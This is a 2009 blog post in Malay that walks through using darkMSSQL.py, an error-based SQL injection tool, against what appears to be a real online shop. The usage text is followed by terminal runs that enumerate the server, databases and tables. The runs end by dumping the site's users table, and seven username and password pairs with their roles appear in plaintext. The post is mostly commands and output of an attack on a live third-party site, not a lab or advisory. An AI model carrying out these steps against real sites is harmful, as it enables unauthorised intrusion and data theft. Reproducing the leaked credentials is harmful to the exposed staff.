darkMSSQL tutorial

Hari ini aku nak tunjukkan macammana cara menggunakan darkMSSQL.py…

benda ni digunakan untuk MSSQL database yang ade error..

darkMSSQL.py journey… begin…

-h command (help)
Usage: ./darkMSSQL.py [options]                       rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: –info    Gets MySQL server configuration only.
Define: –dbs     Shows all databases user has access too.
Define: –schema  Enumerate Information_schema Database.
Define: –dump    Extract information from a Database, Table and Column.
Define: –insert  Insert data into specified db, table and column(s).

Required:
Define: -u        URL “www.site.com/news.asp?id=2” or “www.site.com/index.asp?id=news'”

Mode dump and schema options:
Define: -D        “database_name”
Define: -T        “table_name”
Define: -C        “column_name,column_name…”

Optional:
Define: -p        “127.0.0.1:80 or proxy.txt”
Define: -o        “ouput_file_name.txt”        Default is darkMSSQLlog.txt
Define: -r        “-r 20” this will make the script resume at row 20 during dumping
Define: –cookie  “cookie_file.txt”
Define: –debug   Prints debug info to terminal.

Ex: ./darkMSSQL.py –info -u “www.site.com/news.asp?id=2”
Ex: ./darkMSSQL.py –dbs -u “www.site.com/news.asp?id=2”
Ex: ./darkMSSQL.py –schema -u “www.site.com/news.asp?id=2” -D dbname
Ex: ./darkMSSQL.py –dump -u “www.site.com/news.asp?id=2” -D dbname -T tablename -C username,password
Ex: ./darkMSSQL.py -u “www.site.com/news.asp?news=article'” -D dbname -T table -C user,pass –insert -D dbname -T table -C darkuser,darkpass

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py –info -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|————————————————|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|————————————————|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:25
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying information about MSSQL host!

[+] @@VERSION: Microsoft SQL Server  2000 – 8.00.2039 (Intel X86)
May  3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

[+] USER: mylittletail_usr
[+] DB_NAME(): mylittletail_db
[+] HOST_NAME(): SERVER439

[+] Script detected Microsoft SQL Version:  2000
[+] Checking to see if we can view password hashs… Nope!

[-] [00:19:26]
[-] Total URL Requests 5
[-] Done

Don’t forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py –dbs -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|————————————————|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|————————————————|

[+] URL: http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:39
[+] Cookie: None
[-] Proxy Not Given
[+] Displaying list of all databases on MSSQL host!

[0] mylittletail_db
[1] master
[2] tempdb
[3] model
[4] msdb
[5] pubs
[6] Northwind
[7] lotteryuk_db
[8] mylittletail_db
[9] sailor_db

[-] 00:19:41
[-] Total URL Requests 11
[-] Done

Don’t forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py –schema -D mylittletail_db -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|————————————————|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|————————————————|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:31:03
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying tables inside DB: mylittletail_db

[0] addon
[1] category
[2] country
[3] delivery
[4] discount
[5] dtproperties
[6] featured_category
[7] featured_item
[8] featured_maincategory
[9] item_packages
[10] item_questions
[11] items
[12] items_addon
[13] items_also
[14] main_items
[15] member
[16] message
[17] millkak
[18] newsletter_counter
[19] newsletter_log
[20] newsletter_master
[21] order
[22] order_item
[23] subcategory
[24] sysconstraints
[25] syssegments
[26] t_jiaozhu
[27] temp_order
[28] temp_order_id
[29] ticketing
[30] uploadform
[31] userlog
[32] users

[-] [00:31:09]
[-] Total URL Requests 34
[-] Done

Don’t forget to check darkMSSQLlog.txt

samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py –dump -D mylittletail_db -T users -C username,password -u http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|————————————————|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|————————————————|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:27:52
[+] Cookie: None
[+] Proxy Not Given
[0] 20admin08:72hu1ge9 admin
[1] yennee08:01yen04nee admin
[2] jolen18e:dedica18 staff
[3] jason:11jas37on5 admin
[4] katrina03:031983 staff
[5] zack09:20gift09 staff
[6] 3sales69:3moneytail69 staff

[-] [00:27:54]
[-] Total URL Requests 8
[-] Done

Don’t forget to check darkMSSQLlog.txt

korang paham x bnd ni?

klu x paham, bole tny aku..

bukannya susah sgt pn.. 😀

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! 🙂

Advertisements

~ by Zam on December 30, 2009.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

 
%d bloggers like this: